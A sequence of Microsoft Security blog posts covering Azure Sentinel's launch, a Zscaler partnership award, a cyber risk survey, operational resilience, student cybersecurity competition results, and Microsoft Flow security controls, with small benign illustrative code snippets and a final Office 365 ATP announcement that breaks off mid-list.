Machine learning and artificial intelligence (AI) hold great promise in addressing many of the global cyber challenges we see today. They give our cyber defenders the ability to identify, detect, and block malware almost instantaneously, and they give security admins the ability to deconflict tasks, separating the signal from the noise so they can prioritize the most critical work. That is why today I’m pleased to announce that Azure Sentinel, a cloud-native SIEM that provides intelligent security analytics at cloud scale for enterprises of all sizes and workloads, is now generally available.

Our goal has remained the same since we first launched Microsoft Azure Sentinel in February: empower security operations teams to enhance the security posture of our customers. Traditional Security Information and Event Management (SIEM) solutions have not kept pace with digital change. I commonly hear from customers that they’re spending more time on the deployment and maintenance of SIEM solutions, which leaves them unable to properly handle the volume of data or the agility of adversaries.

Recent research tells us that 70 percent of organizations continue to anchor their security analytics and operations with SIEM systems,1 and 82 percent are committed to moving large volumes of applications and workloads to the public cloud.2 Security analytics and operations technologies must lean in and help security analysts deal with the complexity, pace, and scale of their responsibilities. To accomplish this, 65 percent of organizations are leveraging new technologies for process automation/orchestration, while 51 percent are adopting security analytics tools featuring machine learning algorithms.3 This is exactly why we developed Azure Sentinel—a SIEM reinvented in the cloud to address the modern challenges of security analytics.

Learning together

When we kicked off the public preview of Azure Sentinel, we were excited to learn about the unique ways Azure Sentinel was helping organizations and defenders on a daily basis. We worked with our partners all along the way, listening, learning, and fine-tuning as we went. With feedback from 12,000 customers and more than two petabytes of data analyzed, we were able to dive deep into a large, complex, and diverse set of customer environments, all of which had one thing in common: a need to empower their defenders to be more nimble and efficient when it comes to cybersecurity.

Our work with RapidDeploy offers one compelling example of how Azure Sentinel is accomplishing this complex task. RapidDeploy creates cloud-based dispatch systems that help first responders act quickly to protect the public. There’s a lot at stake, and the company’s cloud-native platform must be secure against an array of serious cyberthreats. So when RapidDeploy implemented a SIEM system, it chose Azure Sentinel, one of the world’s first cloud-native SIEMs.

Microsoft recently sat down with Alex Kreilein, Chief Information Security Officer at RapidDeploy. Here’s what he shared: “We build a platform that helps save lives. It does that by reducing incident response times and improving first responder safety by increasing their situational awareness.”

Now RapidDeploy uses the complete visibility, automated responses, fast deployment, and low total cost of ownership in Azure Sentinel to help it safeguard public safety systems. “With many SIEMs, deployment can take months,” says Kreilein. “Deploying Azure Sentinel took us minutes—we just clicked the deployment button and we were done.”

Learn even more about our work with RapidDeploy by checking out the full story.

Another great example of a company finding results with Azure Sentinel is ASOS. As one of the world’s largest online fashion retailers, ASOS knows they’re a prime target for cybercrime. The company has a large security function spread across five teams and two sites—but in the past, it was difficult for ASOS to gain a comprehensive view of cyberthreat activity. Now, using Azure Sentinel, ASOS has created a bird’s-eye view of everything it needs to spot threats early, allowing it to proactively safeguard its business and its customers. And as a result, it has cut issue resolution times in half.

“There are a lot of threats out there,” says Stuart Gregg, Cyber Security Operations Lead at ASOS. “You’ve got insider threats, account compromise, threats to our website and customer data, even physical security threats. We’re constantly trying to defend ourselves and be more proactive in everything we do.”

Already using a range of Azure services, ASOS identified Azure Sentinel as a platform that could help it quickly and easily unite its data. This includes security data from Azure Security Center and Azure Active Directory (Azure AD), along with data from Microsoft 365. The result is a comprehensive view of its entire threat landscape.

“We found Azure Sentinel easy to set up, and now we don’t have to move data across separate systems,” says Gregg. “We can literally click a few buttons and all our security solutions feed data into Azure Sentinel.”

Learn more about how ASOS has benefitted from Azure Sentinel.

RapidDeploy and ASOS are just two examples of how Azure Sentinel is helping businesses process data and telemetry into actionable security alerts for investigation and response. We have an active GitHub community of preview participants, partners, and even Microsoft’s own security experts who are sharing new connectors, detections, hunting queries, and automation playbooks.

With these design partners, we’ve continued our innovation in Azure Sentinel. It starts with the ability to connect to any data source, whether in Azure, on-premises, or even in other clouds. We continue to add new connectors to different sources and more machine learning-based detections. Azure Sentinel will also integrate with the Azure Lighthouse service, which will enable service providers and enterprise customers to view Azure Sentinel instances across different tenants in Azure.

Secure your organization

Now that Azure Sentinel has moved out of public preview and is generally available, there’s never been a better time to see how it can help your business. Traditional on-premises SIEMs require a combination of infrastructure costs and software costs, all paired with annual commitments or inflexible contracts. We are removing those pain points, since Azure Sentinel is a cost-effective, cloud-native SIEM with predictable billing and flexible commitments.

Infrastructure costs are reduced because resources scale automatically as you need them, and you only pay for what you use. Or you can save up to 60 percent compared to pay-as-you-go pricing by taking advantage of capacity reservation tiers. You receive predictable monthly bills and the flexibility to change capacity tier commitments every 31 days. On top of that, bringing in data from Office 365 audit logs, Azure activity logs, and alerts from Microsoft Threat Protection solutions doesn’t require any additional payments.

Please join me for the Azure Security Expert Series where we will focus on Azure Sentinel on Thursday, September 26, 2019, 10–11 AM Pacific Time. You’ll learn more about these innovations and see real use cases of how Azure Sentinel helped detect previously undiscovered threats. We’ll also discuss how Accenture and RapidDeploy are using Azure Sentinel to empower their security operations teams.

Get started today with Azure Sentinel!

1 Source: ESG Research Survey, Security Analytics and Operations: Industry Trends in the Era of Cloud Computing, September 2019
2 Source: ESG Research Survey, Security Analytics and Operations: Industry Trends in the Era of Cloud Computing, September 2019
3 Source: ESG Research Survey, Security Analytics and Operations: Industry Trends in the Era of Cloud Computing, September 2019

Last week at Zscaler’s user conference, Zenith Live, Microsoft received Zscaler’s Technology Partner of the Year Award in the Impact category. The award recognizes the depth and breadth of the integrations we’ve built with Zscaler and the positive feedback customers have shared about those integrations.

Together with Zscaler—a Microsoft Intelligent Security Association (MISA) member—we’re focused on providing our joint customers with secure, fast access to the cloud for every user. Since partnering with Zscaler, we’ve delivered several integrations that help our customers better secure their environments, including:

  • Azure Active Directory (Azure AD) integration to extend conditional access policies to Zscaler applications to validate user access to cloud-based applications. We also announced support for user provisioning of Zscaler applications to enable automated, policy-based provisioning and deprovisioning of user accounts with Azure AD.
  • Microsoft Intune integration that allows IT administrators to provision Zscaler applications to specific Azure AD users or groups within the Intune console and configure connections by using the existing Intune VPN profile workflow.
  • Microsoft Cloud App Security integration to discover and manage access to Shadow IT in an organization. Zscaler can be leveraged to send traffic data to Microsoft’s Cloud Access Security Broker (CASB) to assess cloud services against risk and compliance requirements before making access control decisions for the discovered cloud apps.

“We’re excited to see customers use Zscaler and Microsoft solutions together to deliver fast, secure, and direct access to the applications they need. The Technology Partner of the Year Award is a testament to Microsoft’s commitment to helping customers better secure their environments.”
—Punit Minocha, Vice President of Business Development at Zscaler

“The close collaboration between our teams and deep integration across Zscaler and Microsoft solutions help our joint customers be more secure and ensure their users stay productive. We’re pleased to partner with Zscaler and honored to be named Zscaler’s Technology Partner of the Year.”
—Alex Simons, Corporate Vice President of Program Management at Microsoft

We’re thrilled to be Zscaler’s Technology Partner of the Year in the Impact category, and we look forward to our continued partnership with Zscaler.

Technology is dramatically transforming the global business environment, with continual advances in areas ranging from artificial intelligence (AI) and the Internet of Things (IoT) to data availability and blockchain. The speed at which digital technologies evolve and disrupt traditional business models keeps increasing. At the same time, cyber risks seem to evolve even faster—moving beyond data breaches and privacy concerns to sophisticated schemes that can disrupt entire businesses, industries, supply chains, and nations—costing the economy billions of dollars and affecting companies in every sector.

The hard truth organizations must face is that cyber risk can be mitigated and managed—but it cannot be eliminated. Results from the 2019 Marsh-Microsoft Global Cyber Risk Perception survey reveal several encouraging signs of improvement in the way that organizations view and manage cyber risk. Now that cyber risk is clearly and firmly at the top of corporate risk agendas, we see a positive shift towards the adoption of more rigorous, comprehensive cyber risk management in many areas. However, many organizations still struggle with how to best articulate, approach, and act upon cyber risk within their overall enterprise risk framework—even as the tide of technological change brings new and unanticipated cyber risk complexity.

Highlights from the survey

While companies see cyber events as a top priority, confidence in cyber resilience is declining. Cyber risk became even more firmly entrenched as an organizational priority in the past two years. Yet at the same time, organizations’ confidence in their ability to manage the risk declined.

  • 79 percent of respondents ranked cyber risk as a top five concern for their organization, up from 62 percent in 2017.
  • Confidence declined in each of three critical areas of cyber resilience. Those saying they had “no confidence” increased from:
    • 9 percent to 18 percent for understanding and assessing cyber risks.
    • 12 percent to 19 percent for preventing cyber threats.
    • 15 percent to 22 percent for responding to and recovering from cyber events.

New technology brings increased cyber exposure

Technology innovation is vital to most businesses, but often adds to the complexity of an organization’s technology footprint, including its cyber risk.

  • 77 percent of the 2019 respondents cited at least one innovative operational technology they adopted or are considering.
  • 50 percent said cyber risk is almost never a barrier to the adoption of new technology, but 23 percent—including many smaller firms—said that for most new technologies, the risk outweighs potential business benefits.
  • 74 percent evaluate technology risks prior to adoption, but just 5 percent said they evaluate risk throughout the technology lifecycle—and 11 percent do not perform any evaluation.

Increasingly interdependent digital supply chains bring new cyber risks

The increasing interdependence and digitization of supply chains bring increased cyber risk to all parties, but many firms perceive the risks as one-sided.

  • There was a discrepancy in many organizations’ view of the cyber risk they face from supply chain partners, compared to the level of risk their organization poses to counterparties.
  • 39 percent said the cyber risk posed by their supply chain partners and vendors to their organization was high or somewhat high.
  • Only 16 percent said the cyber risk they themselves pose to their supply chain was high or somewhat high.
  • Respondents were more likely to set a higher bar for their own organization’s cyber risk management actions than for their suppliers.

Appetite for government role in managing cyber risks draws mixed views

Organizations generally see government regulation and industry standards as having limited effectiveness in helping manage cyber risk—with the notable exception of nation-state attacks.

  • 28 percent of businesses regard government regulations or laws as being very effective in improving cybersecurity.
  • 37 percent of businesses regard soft industry standards as being very effective in improving cybersecurity.
  • A key area of difference relates to cyberattacks by nation-state actors:
    • 54 percent of respondents said they are highly concerned about nation-state cyberattacks.
    • 55 percent said government needs to do more to protect organizations against nation-state cyberattacks.

Cyber investments focus on prevention, not resilience

Many organizations focus on technology defenses and investments to prevent cyber risk, to the neglect of assessment, risk transfer, response planning, and other risk management areas that build cyber resilience.

  • 88 percent said information technology/information security (IT/InfoSec) is one of the three main owners of cyber risk management, followed by executive leadership/board (65 percent) and risk management (49 percent).
  • Only 17 percent of executives say they spent more than a few days on cyber risk over the past year.
  • 64 percent said a cyberattack on their organization would be the biggest driver of increased cyber risk spending.
  • 30 percent of organizations reported using quantitative methods to express cyber risk exposures, up from 17 percent in 2017.
  • 83 percent have strengthened computer and system security over the past two years, but less than 30 percent have conducted management training or modeled cyber loss scenarios.

Cyber insurance

Cyber insurance coverage is expanding to meet evolving threats, and attitudes toward policies are also shifting.

  • 47 percent of organizations said they have cyber insurance, up from 34 percent in 2017.
  • Larger firms were more likely to have cyber insurance—57 percent of those with annual revenues above $1 billion had a policy, compared to 36 percent of those with revenue under $100 million.
  • Uncertainty about whether available cyber insurance could meet their firm’s needs dropped to 31 percent, down from 44 percent in 2017.
  • 89 percent of those with cyber insurance were highly confident or fairly confident their policies would cover the cost of a cyber event.

Key takeaways

At a practical level, this year’s survey points to a number of best practices that the most cyber resilient firms employ and which all firms should consider adopting:

  • Create a strong organizational cybersecurity culture with clear, shared standards for governance, accountability, resources, and actions.
  • Quantify cyber risk to drive better informed capital allocation decisions, enable performance measurement, and frame cyber risk in the same economic terms as other enterprise risks (a simple worked example follows this list).
  • Evaluate the cyber risk implications of a new technology as a continual and forward-looking process throughout the lifecycle of the technology.
  • Manage supply chain risk as a collective issue, recognizing the need for trust and shared security standards across the entire network, including the organization’s cyber impact on its partners.
  • Pursue and support public-private partnerships around critical cyber risk issues that can deliver stronger protections and baseline best practice standards for all.
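One established way to put cyber risk in economic terms is annualized loss expectancy (ALE), the product of single loss expectancy (SLE) and annualized rate of occurrence (ARO). The survey does not prescribe a specific method; the sketch below, with invented figures, simply illustrates the kind of quantification the recommendation points to.

    # Illustrative only: annualized loss expectancy (ALE) = SLE * ARO.
    # The scenario and figures are invented, not drawn from the survey.
    def ale(single_loss_expectancy: float, annual_rate_of_occurrence: float) -> float:
        """Expected yearly loss from a risk, in the same units as the SLE."""
        return single_loss_expectancy * annual_rate_of_occurrence

    # A hypothetical ransomware scenario: $2M per incident, expected once every four years.
    print(f"ALE: ${ale(2_000_000, 0.25):,.0f}")  # ALE: $500,000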

Despite the decline in organizational confidence in the ability to manage cyber risk, we’re optimistic that more organizations are now clearly recognizing the critical nature of the threat and beginning to seek out and embrace best practices.

Effective cyber risk management requires a comprehensive approach employing risk assessment, measurement, mitigation, transfer, and planning, and the optimal program will depend on each company’s unique risk profile and tolerance.

Still, these recommendations address many of the common and most urgent aspects of cyber risk that organizations today are challenged with; as such, they should be viewed as signposts along the path to building true cyber resilience.

Learn more

Read the full 2019 Marsh-Microsoft Global Cyber Risk Perception survey or find additional report content on Marsh’s website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

Operational resilience cannot be achieved without a true commitment to and investment in cyber resilience. If they are to weather such events, global organizations need to reach the state where their core operations and services won’t be disrupted by geopolitical or socioeconomic events, natural disasters, or cyber events.

To help increase stability and lessen the impact on their citizens, an increasing number of government entities have drafted regulations requiring the largest organizations to achieve a true state of operational resilience: one in which both individual organizations and their industry absorb and adapt to shocks, rather than contributing to them. Many phenomena have led to this increased governance, including high-profile cyberattacks like NotPetya and WannaCrypt and the proliferation of ransomware.

The rise in nation-state and cybercrime attacks focused on critical infrastructure and the financial sector, along with the rapid growth of tech innovation pervading more and more industries, joins an alarming increase in severe natural disasters, an unstable global geopolitical environment, and global financial market instability on the list of threats organizations should prepare for.

Potential impact of cybercrime attacks

Taken individually, any of these events can cripple critical business and government operations. A lightning strike this summer caused the UK’s National Grid to suffer the biggest blackout in decades. It affected homes across the country, shut down traffic signals, and closed some of the busiest train stations in the middle of the Friday evening rush hour. With trains needing to be manually rebooted, the rhythm of everyday work life was disrupted. The impact of cybercrime attacks can be as significant, and often longer term.

NotPetya cost businesses more than $10 billion; pharmaceutical giant Merck alone put its bill at $870 million. For more than a week, the malware shut down cranes and security gates at Maersk shipping terminals, as well as most of the company’s IT network—from the booking site to the systems handling cargo manifests. It took two months to rebuild all the software systems, and three months before all cargo in transit was tracked down—with recovery dependent on a single server that happened to be offline during the attack because its power had been cut.

The combination of all these threats will cause disruption to businesses and government services on a scale that hasn’t been seen before. Cyber events will also undermine the ability to respond to other types of events, so they need to be treated holistically as part of planning and response.

Extending operational resiliency to cover your cybersecurity program should not mean applying different principles to attacks, outages, and third-party failures than you would to physical attacks and natural hazards. In all cases, the emphasis is on having plans in place to deliver essential services whatever the cause of the disruption. Organizations are responding by rushing to purchase cyber-insurance policies and increasing their spending on cybersecurity. I encourage them to take a step back, build a critical understanding of what those policies actually cover, and target their investments so the overall approach supports operational resilience.

As we continue to witness an unparalleled increase in cyber-related attacks, we should take note that a large majority of the attacks have many factors in common. At Microsoft, we’ve written at length on the controls that best position an organization to defend against and respond to a cyber event.

We must not stand still

The adversary is innovating and accelerating. We must continue to be vigilant and thorough in both security posture, which must be based on “defense in depth,” and in sophistication of response.

The cost of data breaches continues to rise; the global average cost of a data breach is $3.92 million according to the 2019 Ponemon Institute report. This is up 1.5 percent from 2018 and 12 percent higher than in 2014. These continually rising costs have helped galvanize global entities around the topic of operational resilience.

The Bank of England, in July 2018, published comprehensive guidelines on operational resilience that set a robust standard for rigorous controls across all key areas: technology, legal, communications, financial solvency, business continuity, redundancy, failover, governmental, and customer impact, as well as full understanding of what systems and processes underlie your business products and services.

This paper leaves very few stones unturned and includes a clear statement of my thesis—dealing with cyber risk is an important element of operational resilience and you cannot achieve operational resilience without achieving cyber resilience.

Imagine for a moment that your entire network, including all your backups, is impacted by a cyberattack, and you cannot complete even a single customer banking transaction. That’s only one target; it’s not hard to extrapolate from here to attacks that shut down stock trades, real estate transactions, fund transfers, even to attacks on critical infrastructure like healthcare, energy, and water system operators. In the event of a major attack, all these essential services will be unavailable until IT systems are restored to at least a baseline of operations.

It doesn’t require professional cybersecurity expertise to understand the impact of shutting down critical services, which is why the new paradigm for cybersecurity must begin not with regulations but with a program to build cyber resilience. The long list of public, wide-reaching cyberattacks where the companies were compliant with required regulations, but still were breached, demonstrates why we can no longer afford to use regulatory requirements as the ultimate driver of cybersecurity.

While it will always be necessary to be fully compliant with regulations like GDPR, SOX, HIPAA, MAS, regional banking regulators, and any others that might be relevant to your industry, it simply isn’t sufficient for a mature cyber program to use this compliance as the only standard. Organizations must build a program that incorporates defense in depth and implements fundamental security controls like multifactor authentication (MFA), encryption, network segmentation, patching, and isolation and reduction of exceptions. We also must consider how our operations will continue after a catastrophic cyberattack and build systems that can both withstand attack and remain resilient even during such an attack. The Bank of England uses the mnemonic WAR: withstand, absorb, recover.

The ability to do something as simple as restoring from recent backups will be tested in every ransomware attack, and many organizations will fail this test—not because they are not backing up their systems, but because they haven’t tested the quality of their backup procedures or practiced for a cyber event. Training is not enough. Operational resilience guidelines call for demonstrating that you have concrete measures in place to deliver resilient services and that both incident management and contingency plans have been tested. You’ll need to invest in scenario planning, tabletop exercises, and red/blue team exercises that prove the rigor of your threat modeling and give practice in recovering from catastrophic cyber events.

Importance of a cyber recovery plan

Imagine, if you will, how negligent it would be for your organization to never plan and prepare for a natural disaster. A cyber event is the equivalent: the same physical, legal, operational, technological, human, and communication standards must apply to preparation, response, and recovery. We should all consider it negligence if we do not have a cyber recovery plan in place. Yet, while the majority of firms have a disaster recovery plan on paper, nearly a quarter never test it, and only 42 percent of global executives are confident their organization could recover from a major cyber event without it affecting their business.

Cybersecurity often focuses on defending against specific threats and vulnerabilities to mitigate cyber risk, but cyber resilience requires a more strategic and holistic view of what could go wrong and how your organization will address it as a whole. The cyber events you’ll face are real threats, and preparing for them must be treated like any other form of continuity and disaster recovery. The challenges to building operational resilience have become more intense in an increasingly hostile cyber environment, and this preparation is a topic we will continue to address.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

With a projected cybersecurity “skills gap” numbering in the millions of open positions, educating a diverse workforce is critical to corporate and national cyber defense moving forward. However, are today’s students getting the preparation they need to do the cybersecurity work of tomorrow?

To help educators prepare meaningful curricula, the National Institute of Standards and Technology (NIST) has developed the National Initiative for Cybersecurity Education (NICE) Cybersecurity Workforce Framework. The U.S. Department of Energy (DOE) is also doing its part to help educate our future cybersecurity workforce through initiatives like the CyberForce Competition™, designed to support hands-on cyber education for college students and professionals. The CyberForce Competition™ emulates real-world, critical infrastructure scenarios, including “cyber-physical infrastructure and lifelike anomalies and constraints.”

As anyone who’s worked in cybersecurity knows, a big part of operational reality are the unexpected curveballs ranging from an attacker’s pivot while escalating privileges through a corporate domain to a request from the CEO to provide talking points for an upcoming news interview regarding a recent breach. In many “capture the flag” and “cyber-range exercises,” these unexpected anomalies are referred to as “injects,” the curveballs of the training world.

For the CyberForce Competition™, anomalies are mapped across the seven NICE Framework Workforce Categories illustrated below:

Image showing seven categories of cybersecurity: Operate and Maintain, Oversee and Govern, Collect and Operate, Securely Provision, Analyze, Protect and Defend, and Investigate.

NICE Framework Workforce categories, NIST SP 800-181.

Students were assessed based on how many and what types of anomalies they responded to and how effective/successful their responses were.

Tasks where students excelled

  • Threat tactic identification—Students excelled in identifying threat tactics and corresponding methodologies. This was shown through an anomaly that required students to parse through and analyze a log file to identify various indicators of insider threat; for example, too many sign-ins at one time, odd sign-in times, or sign-ins from non-standard locations.
  • Log file analysis and review—One task required students to identify non-standard browsing behavior of agents behind a firewall. To accomplish this task, students had to write code to parse and analyze the log files of a fictitious company’s intranet web servers. Statistical evidence from the event indicates that students are comfortable writing code to parse log file data and performing data analysis.
  • Insider threat investigations—Students gravitated towards the anomalies and tasks connected to insider threat identification, which maps to the Securely Provision pillar. Using the log analysis techniques described above, students were able to identify, with a high rate of success, individuals with higher than average sign-in failure rates and those with anomalous successful logins, such as from many different devices or locations. (A simplified sketch of this kind of analysis follows this list.)
  • Network forensics—The data indicated that overall the students had success with the network packet capture (PCAP) forensics via analysis of network traffic full packet capture streams. They also had a firm grasp on related tasks, including file system forensic analysis and data carving techniques.
  • Trivia—Students were not only comfortable with writing code and parsing data, but also showed they have solid comprehension and intelligence related to cybersecurity history and trivia. Success in this category ranked in the higher percentile of the overall competition.
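To make the log-analysis tasks above concrete, here is a minimal sketch of the kind of sign-in anomaly detection students performed. The CSV layout (user, result, timestamp) and the thresholds are assumptions for illustration; the competition’s actual log formats are not published here.

    # Sketch: flag users with unusually high sign-in failure rates from a log file.
    # The column names and thresholds are illustrative assumptions.
    import csv
    from collections import Counter

    failures, totals = Counter(), Counter()
    with open("signin_log.csv", newline="") as f:
        for row in csv.DictReader(f):        # assumed columns: user, result, timestamp
            totals[row["user"]] += 1
            if row["result"] == "FAILURE":
                failures[row["user"]] += 1

    for user, total in totals.items():
        rate = failures[user] / total
        if total >= 10 and rate > 0.5:       # arbitrary illustrative thresholds
            print(f"{user}: {failures[user]}/{total} failed sign-ins ({rate:.0%})")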

Pillar areas for improvement

  • Collect and Operate—This pillar “provides specialized denial and deception operations and collection of cybersecurity information that may be used to develop intelligence.” Statistical analysis gathered during the competition indicated that students hesitated to attempt the activities in this pillar, including some tasks similar to those they completed successfully in other exercises. For example, some fairly simple tasks, such as analyzing logs for specific numbers of entries and records on a certain date, had a zero percent completion rate. Reasons for non-completion could include technical inability on the part of the students, a poorly written anomaly/task, or even an issue with sign-ins to certain lab equipment.
  • Investigate—Based on the data, the Investigate pillar posed some challenges for the students. Students had a zero percent success rate on image analysis and an almost zero percent success rate on malware analysis. In addition, students had a zero percent success rate in this pillar for finding and identifying a bad file in the system.

Key takeaways

Frameworks like NIST NICE and competitions like the DOE CyberForce Competition are helping to train up the next generation of cybersecurity defenders. Analysis from the most recent CyberForce Competition indicates that students are comfortable with tasks in the “Protect and Defend” pillar and are proficient in many critical tasks, including network forensics and log analysis. The data points to areas for improvement especially in the “Collect and Operate” and “Investigate” pillars, and for additional focus on forensic skills and policy knowledge.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The CyberForce work was partially supported by the U.S. Department of Energy Office of Science under contract DE-AC02-06CH11357.

In part 1 of this series, we introduced you to Microsoft Flow, a powerful automation service already being used by many organizations across the world. Flow is designed to empower citizen developers while featuring capabilities sought by professional developers. Flow is also a foundational element of the Microsoft Power Platform announced earlier this year.

More organizations are seeking automation solutions, and they will have many options to choose from. As security professionals, you’ll have to recommend a service that offers all the benefits of automation while ensuring the organization remains secure and compliant. Flow is natively integrated with best-in-class authentication services, offers powerful data loss prevention and an enhanced IT experience ranging from broad visibility and control to automating IT functions, and is built on rigorous privacy and compliance standards. We’re confident that Flow will be the right choice for your organization, so let’s get started on showing you why.

Prioritized security for your users and data

Flow is seamlessly integrated with Azure Active Directory (Azure AD), one of the world’s most sophisticated, comprehensive, and secure identity and access management services. Azure AD helps secure the citizen developer by protecting against identity compromise, gives the IT admin/pro visibility and control, and offers additional security capabilities for the pro developer. Azure AD helps support the least privilege strategy, which we recommend for Flow users. Azure AD also follows a federated model, so organizations not directly using the service are still secure. Since authentication to Flow is via Azure AD, admins using its premium features can create conditional access policies which restrict user access to only the apps and data relevant for their role. Flow’s integration with Azure AD also enhances security for more experienced developers who can register applications with the service and leverage multiple authentication protocols, including the OAuth2 authorization framework to enable their code to access platform APIs (Figure 1). This access protection can also be extended to external users.

Screenshot of an authentication type being selected for a connector in Microsoft Flow.

Figure 1. Choosing authentication framework for custom Flow connector.
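As a concrete illustration of the client side of this pattern, the sketch below uses the MSAL library for Python to acquire an Azure AD token with the OAuth2 client-credentials flow, as a registered application might before calling platform APIs. The tenant, client ID, secret, and scope are placeholders; the exact scope depends on the API your connector targets.

    # Minimal sketch: acquire an Azure AD token via the OAuth2 client-credentials
    # flow with MSAL. All identifiers below are placeholders for your app registration.
    import msal

    TENANT_ID = "<your-tenant-id>"
    CLIENT_ID = "<your-app-client-id>"
    CLIENT_SECRET = "<your-client-secret>"

    app = msal.ConfidentialClientApplication(
        CLIENT_ID,
        authority=f"https://login.microsoftonline.com/{TENANT_ID}",
        client_credential=CLIENT_SECRET,
    )

    # Request a token; the scope depends on the target API.
    result = app.acquire_token_for_client(scopes=["https://graph.microsoft.com/.default"])

    if "access_token" in result:
        token = result["access_token"]   # send as "Authorization: Bearer <token>"
    else:
        print(result.get("error_description"))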

To experience the full benefits of automation and unlock the potential of an organization’s data, Flow offers 270+ connectors to services, including third-party services. Some connectors are even built for social media sites, such as Twitter (Figure 2). With so many integrations, there’s always the threat of data leakage or compromise. Imagine the scenario where a user mistakenly tweets sensitive data. To prevent these types of scenarios, Flow is supported by the Microsoft Data Loss Prevention (DLP) service.

Screenshot of the Microsoft Flow dashboard. A search has been conducted for "twitter."

Figure 2. Pre-built Flow templates offering automation between Twitter and several other applications.

Microsoft DLP protects data from being exposed, and DLP policies can be easily created by administrators. DLP policies can be customized at the user, environment, or tenant level to ensure security is maintained without impact to productivity. These policies enforce rules about which connectors can be used together by classifying connectors as either “Business Data Only” or “No Business Data Allowed” (Figure 3). A connector can only be used with other connectors within its group. For example, a connector in the Business Data Only group can only be used with other connectors from that group. The default setting for all connectors is No Business Data Allowed.
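The grouping rule amounts to a simple invariant: every connector in a flow must come from the same data group. The sketch below expresses that check in Python; the connector names and group assignments are illustrative, not pulled from a real tenant.

    # Conceptual sketch of the DLP grouping rule: a flow is allowed only if all of
    # its connectors fall within a single data group. Names are illustrative.
    BUSINESS_DATA_ONLY = {"SharePoint", "Outlook", "Dynamics 365"}
    NO_BUSINESS_DATA = {"Twitter", "RSS"}   # the default group for connectors

    def flow_allowed(connectors):
        """Return True if the flow's connectors sit in a single DLP group."""
        in_business = connectors & BUSINESS_DATA_ONLY
        in_non_business = connectors & NO_BUSINESS_DATA
        return not (in_business and in_non_business)

    print(flow_allowed({"SharePoint", "Outlook"}))   # True: one group
    print(flow_allowed({"SharePoint", "Twitter"}))   # False: mixed groups, blocked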

Importantly, all data used by Flow is also encrypted during transit using HTTPS. As a security leader, you can feel reassured that Flow is designed to ensure your data is secured both at rest and in transit with strict enforcement. To learn more about strategies for creating DLP policies for Flow connectors, check out our white paper.

Screenshot of data groups in the Microsoft Flow admin center.

Figure 3. Flow Admin center where you can create DLP policies to protect your sensitive data while benefiting from the powerful automation capabilities offered with Flow.

Enhancing management of the IT environment

Flow includes the Flow management connector, which enables admins to automate several IT tasks. The management connector offers 19 possible actions that can be automated—from creating and deleting Flows to more complex actions, such as modifying the owner of a Flow. The Flow management connector is versatile and can be combined with other connectors to automate several admin tasks, enhancing the efficiency of IT teams. For example, security admins can create a Flow combining the management connector with Azure AD, Microsoft Cloud App Security, Outlook, and Teams to quickly send automatic notifications via email or Teams anytime Cloud App Security generates an alert on suspicious activity (Figure 4). Other use cases could include a notification when a new app is created, automatically updating user permissions based on role changes, or tracking when custom connectors are created in your environment.

Screenshot of the Flow template using the management connector, Azure AD, Cloud App Security, Outlook, and Teams.

Figure 4. Flow template using the management connector, Azure AD, Cloud App Security, Outlook, and Teams.

Visibility of activity logs

Many of Flow’s current users are also Office 365 users. As such, Flow event logs are available in the Office 365 Security & Compliance Center. By surfacing activity logs in the Security & Compliance Center, admins gain visibility into which users are creating Flows, if Flows are being shared, as well as which connectors are being used (Figure 5). The activity data is retained for 90 days and can be easily exported in CSV format for further analysis. The event logs surface in the Security & Compliance Center within 90 minutes of the event taking place. Admins also gain insight on which users are using paid versus trial licenses in the Security & Compliance Center.

Screenshot of Microsoft Flow activities accessed through the Office 365 Security & Compliance Center.

Figure 5. Microsoft Flow activities accessed through the Office 365 Security & Compliance Center.

Strict on data privacy and regulatory requirements

Flow adheres to Microsoft’s strict standards of privacy and protection of customer data. These policies prohibit customer data from being mined for marketing or advertising. Microsoft personnel and subcontractors are also restricted from accessing customer data and we carefully define requirements for responding to government requests for customer data. Microsoft also complies with international data protection laws regarding transfers of customer data across borders.

Microsoft Flow is also certified for many global, government, industrial, and regional compliance regulations. You can see the full list of Microsoft certifications, while Table 1 summarizes the certifications specifically covered by Flow.

Global                   Government   Industry       Regional
CSA-STAR-Attestation     UK G-Cloud   HIPAA/HITECH   EU-Model-Clauses
CSA-Star-Certification                HITRUST
ISO 27001                             PCI DSS
ISO 27018
ISO 9001

Table 1. Flow’s existing certifications.

Let Flow enhance your digital transformation

Let your organization start benefiting from one of the most powerful and secure automation services available on the market. Watch the video and follow the instructions to get started with Flow. Be sure to join the growing Flow community and participate in discussions, provide insights, and even influence product roadmap. Also follow the Flow blog to get news on the latest Flow updates and read our white paper on best practices for deploying Flow in your organization. Be sure to check out part 1, where we provide a quick intro into Flow and dive into its best-in-class, secure infrastructure.

Additional resources

Security teams responsible for investigating and responding to incidents often deal with a massive number of signals from widely disparate sources. As a result, rapid and efficient incident response continues to be the biggest challenge facing security teams today. The sheer volume of these signals, combined with an ever-growing digital estate of organizations, means that a lot of critical alerts miss getting the timely attention they deserve. Security teams need help to scale better, be more efficient, focus on the right issues, and deal with incidents in a timely manner.

This is why I’m excited to announce the general availability of Automated Incident Response in Office 365 Advanced Threat Protection (ATP). Applying these powerful automation capabilities to investigation and response workflows can dramatically improve the effectiveness and efficiency of your organization’s security teams.

A day in the life of a security analyst

To give you an idea of the complexity that security teams deal with in the absence of automation, consider the following typical workflow that these teams go through when investigating alerts:

Infographic showing these steps: Alert, Analyze, Investigate, Assess impact, Contain, and Respond.

And as they go through this flow for every single alert—potentially hundreds in a week—it can quickly become overwhelming. In addition, the analysis and investigation often require correlating signals across multiple different systems. This can make effective and timely response very difficult and costly. There are just too many alerts to investigate and signals to correlate for today’s lean security teams.

To address these challenges, earlier this year we announced the preview of powerful automation capabilities to help improve the efficiency of security teams significantly. The security playbooks we introduced address some of the most common threats that security teams investigate in their day-to-day jobs and are modeled on their typical workflows.

This story from Ithaca College reflects some of the feedback we received from customers of the preview of these capabilities, including:

“The incident detection and response capabilities we get with Office 365 ATP give us far more coverage than we’ve had before. This is a really big deal for us.”
—Jason Youngers, Director and Information Security Officer, Ithaca College

Two categories of automation now generally available

Today, we’re announcing the general availability of two categories of automation—automatic and manually triggered investigations:

  1. Automatic investigations that are triggered when alerts are raised—Alerts and related playbooks for the following scenarios are now available:
